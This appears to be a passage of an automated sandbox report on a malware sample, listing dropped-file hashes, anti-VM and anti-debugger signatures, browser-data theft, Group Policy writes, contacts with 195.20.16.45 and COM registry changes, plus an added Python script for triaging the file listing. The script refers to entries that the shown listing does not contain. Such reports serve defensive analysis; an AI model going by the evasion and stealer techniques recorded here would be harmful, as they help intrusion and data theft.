SHA512 7b911df0087e51fb9f951d544e783e17bc193a4321466cd4d1b298416d2ba46dde457a6d5f75f586f3b4d645203960d9569235509b8207bcced6af803632dac4

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a89283832c07b98503d67fd3dfbf5166
SHA1 0e0025129052d951f61564496328f75f11e85249
SHA256 96d3c721915b0daa3d55ec2e85e32f7bd0453077d1344606015a6043d4136ea7
SHA512 01e649ec84a3ff7f87e6de62e261bd544a410fd8dcbb208bc963fc42235a03229bb619734f31309900b5f24c7242d28803a3e43212397d40a78d014361acb0df

C:\Users\Admin\AppData\Local\Temp\nsoCE67.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

MD5 8ff53e80a706a7318fbea374d10d45a1
SHA1 3090f1b2c4e2925ec4c40e9c075c0e26b0e062d7
SHA256 a8ebc01ef33871d316ab99d917b940e8745c132a05e39ab117ca4b50583d24b4
SHA512 f1f597aae7f571307068b41d520ed0cf5beace1f2023fa1d5c2211a2eb28c88a059e3d17b1cfeae799cf843abf7adb83e7000bd9b336098b1b9e3caa6170f4a9

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

C:\Users\Admin\AppData\Local\Info Tool Extension\is-QQQ64.tmp

MD5 6231b452e676ade27ca0ceb3a3cf874a
SHA1 f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA256 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512 f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\nss3[1].dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\VSO Inspector\is-SJ36R.tmp

MD5 7c4c4a4d5684e8aacdc6b118a601a7bb
SHA1 64c8cc24339d73909916e303ab08a253dd49fe3f
SHA256 d20e213ef79f5f58cf6ca45812648e21612af6b82f52eeee044ea050ab32d75e
SHA512 db34326a59c7e5e809de1da9c98d5464d753dd554e9c8dddc32f164bfe9d637a5d5c6ae093905b8ca075b6801fd0d53e34e6400c7f9e1d553e33618a9baadeea

C:\Users\Admin\AppData\Local\VSO Inspector\is-9PEDE.tmp

MD5 9652fd87be092d9a50ef0156e00f8f8e
SHA1 006ab84afbd111eb8771276120a784c7a935e6c3
SHA256 456c82b7f6e36fe13fdd385579049c426b2fa1307b0180aa0496ca75d522324c
SHA512 5d7b963b0929c00a64a83c2ff235cafa4a98b45082d48ed2d0cf94cb4cd09fdfd0e94deae31ef85ed48bbf7660a39da71f97ed9124233bf448a2b2a76ea5c5d6

C:\Users\Admin\AppData\Local\Temp\305.exe

MD5 1996a23c7c764a77ccacf5808fec23b0
SHA1 5a7141b167056bf8f01c067ebe12ed4ccc608dc7
SHA256 e40c8e14e8cb8a0667026a35e6e281c7a8a02bdf7bc39b53cfe0605e29372888
SHA512 430c8b43c2cbb937d2528fa79c754be1a1b80c95c45c49dba323e3fe6097a7505fc437ddafab54b21d00fba9300b5fa36555535a6fa2eb656b5aa45ccf942e23

C:\ProgramData\EditPush.txt

MD5 a80739e8d257b131e2fb990d3a09bf4e
SHA1 3f2452672c160bb3eccfba3d612cfe95cfc64212
SHA256 b4449d67334535ca485a0245a341d6b9ce3315974bae7f6628aeaa78e14e4583
SHA512 9018a7e7dda66e4f59f42b7f260bd35a2f2165500abaff3cf2c99a40740c2ac4999b401aa1514a34d8dcaf91fa146f57d2de6342cc5036700544513e06a7ad63

C:\ProgramData\UndoSync.docx

MD5 2f04bfc62820734c1465af727c3f81d8
SHA1 b1de4ecafb64e259a0170f7ff418811629f08def
SHA256 d19f86b2d8656cf474f844476822ce8059ec41f29e7c6c9fa0fdb8ef1f7fe84b
SHA512 eddb3fbf823af8de9959090ebeaeb6d309d244ad494c71c9a9c657accdb6f96abcea1529689e79f8dfad0d755f9c62346f914f92cdd0c62ec363ce49d8ad549e

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
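The Files listing above is long and repetitive, and the things worth an analyst's attention are buried in it: the same Install.exe path dropped three times with different hashes, a csrss.exe living in C:\Windows\rss instead of System32, writes into the local Group Policy store, a named pipe whose hashes are those of the empty file, and 40 MiB image regions at 0x400000 in the memory dumps. The script below is an added example, not tooling from the sandbox vendor or part of the report. It parses the listing exactly as laid out on this page (path line followed by MD5/SHA1/SHA256/SHA512 lines; memory regions as memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp) and flags those cases. The SAMPLE text is a constructed subset of the entries above with the blank, MD5, SHA1 and SHA512 lines dropped; EXPECTED_DIRS and the BIG_IMAGE threshold are this example's assumptions, not something the report states.

```python
r"""
Added example, not part of the sandbox report: parse the Files listing above into
records and flag the entries an analyst would triage first. Assumed layout, taken
from this page: a path line, then "MD5 <hex>" ... "SHA512 <hex>" lines; memory
regions appear as "memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp" without hashes.
EXPECTED_DIRS and BIG_IMAGE are this example's assumptions, not the report's.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# SHA-256 of zero bytes: such a record has no content (here a named pipe the
# sandbox opened) and is useless as a file IOC.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
# Binaries that only legitimately live in these directories on Windows 10.
EXPECTED_DIRS = {"csrss.exe": {r"c:\windows\system32", r"c:\windows\syswow64"}}
# Image regions at the classic 0x400000 base above this size deserve a look:
# padding a dropper past AV scan-size limits is a common trick.
BIG_IMAGE = 16 * 1024 * 1024
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int

def normalize(path):
    """Lower-case and restore the drive letter the sandbox sometimes omits."""
    p = path.lower()
    return "c:" + p if p.startswith(("\\users\\", "\\windows\\")) else p

def parse_files_section(text):
    files, dumps, current = [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if m := MEM_RE.match(line):
            pid, seq, start, end = m.groups()
            dumps.append(MemoryDump(int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
        elif (h := HASH_RE.match(line)) and current is not None:
            current.hashes[h.group(1)] = h.group(2).lower()
        else:                          # any other line is a path starting a record
            current = DroppedFile(path=line)
            files.append(current)
    return files, dumps

def triage(files, dumps):
    findings, by_path = [], defaultdict(set)
    for f in files:
        sha = f.hashes.get("SHA256")
        if sha == EMPTY_SHA256:
            findings.append(("empty-content", f.path))
            continue
        norm = normalize(f.path)
        parent, _, name = norm.rpartition("\\")
        if sha:
            by_path[norm].add(sha)
        if name in EXPECTED_DIRS and parent not in EXPECTED_DIRS[name]:
            findings.append(("masquerading-name", f.path))
        if norm.startswith("c:\\windows\\system32\\grouppolicy\\"):
            findings.append(("policy-write", f.path))
    for path, shas in by_path.items():
        if len(shas) > 1:              # same path re-dropped with different content
            findings.append(("same-path-multiple-hashes", path))
    for d in dumps:
        size = d.end - d.start
        if d.start == 0x400000 and size > BIG_IMAGE:
            findings.append(("oversized-image-region", f"pid {d.pid} {size >> 20} MiB"))
    return findings

# Constructed subset of the listing on this page (blank, MD5, SHA1, SHA512 lines dropped).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
SHA256 6cd2c8434c81ddddd2b6d699966b5006706a31d2ce4fae9ccdd12ef25978660d
\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
SHA256 c4b00008efe3d349dad90f7dc034589bf3b4fea607a89457f33229628aa2d675
memory/2032-957-0x0000000000400000-0x0000000002D35000-memory.dmp
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
C:\Windows\rss\csrss.exe
SHA256 fba80de3f16a7dab80c6fba110634f71fce046ad2b73e1fe1a98d64ca652c368
\??\pipe\crashpad_1660_XKTEQPKBCSTPWMQW
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

def run_example():
    files, dumps = parse_files_section(SAMPLE)
    return triage(files, dumps)
```

Paste the full listing in place of SAMPLE and run_example() returns the same five kinds of finding over the whole report. Note that hashes alone do not dedupe a path: the second Install.exe record has no drive letter, which is why normalize() restores it before grouping; without that step the re-drop with a different hash is missed. Hashes of empty content are filtered out before they reach a blocklist.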

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3054445511-921769590-4013668107-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
N/A 224.0.0.251:5353 N/A udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/2176-0-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-1-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-2-0x00007FFD80000000-0x00007FFD80002000-memory.dmp

memory/2176-3-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-4-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-5-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-7-0x00007FFD80030000-0x00007FFD80031000-memory.dmp

memory/2176-6-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

memory/2176-8-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-9-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-10-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-11-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-12-0x0000000140000000-0x0000000140C54000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/2176-20-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-21-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-22-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-23-0x00007FFD80000000-0x00007FFD80002000-memory.dmp

memory/2176-24-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-25-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-26-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

memory/2176-27-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-28-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-29-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-30-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-31-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-32-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-33-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-34-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-35-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-36-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-37-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-38-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-39-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

115s

Max time network

168s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
